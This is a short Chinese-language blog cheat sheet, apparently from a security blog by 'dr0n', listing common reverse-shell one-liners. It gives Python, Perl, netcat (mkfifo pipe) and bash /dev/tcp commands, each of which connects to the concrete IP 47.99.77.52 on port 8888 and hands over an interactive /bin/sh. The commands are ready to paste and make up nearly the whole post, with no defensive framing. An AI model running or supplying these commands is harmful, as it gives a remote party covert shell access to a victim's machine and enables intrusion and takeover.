反弹shell 反弹shell的常用命令 python1python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("47.99.77.52",8888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' perl1perl -e 'use Socket;$i="47.99.77.52";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' nc1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 47.99.77.52 8888 >/tmp/f sh1/bin/sh -i >& /dev/tcp/47.99.77.52/8888 0>&1 总结 #总结 #反弹shell 反弹shell https://www.dr0n.top/posts/2f610211/ 作者 dr0n 发布于 2024年7月15日 更新于 2024年7月15日 许可协议 绕过disable_fuctions的方法总结 上一篇 第十七届全国大学生信息安全竞赛-华东南分区赛 下一篇 Please enable JavaScript to view the comments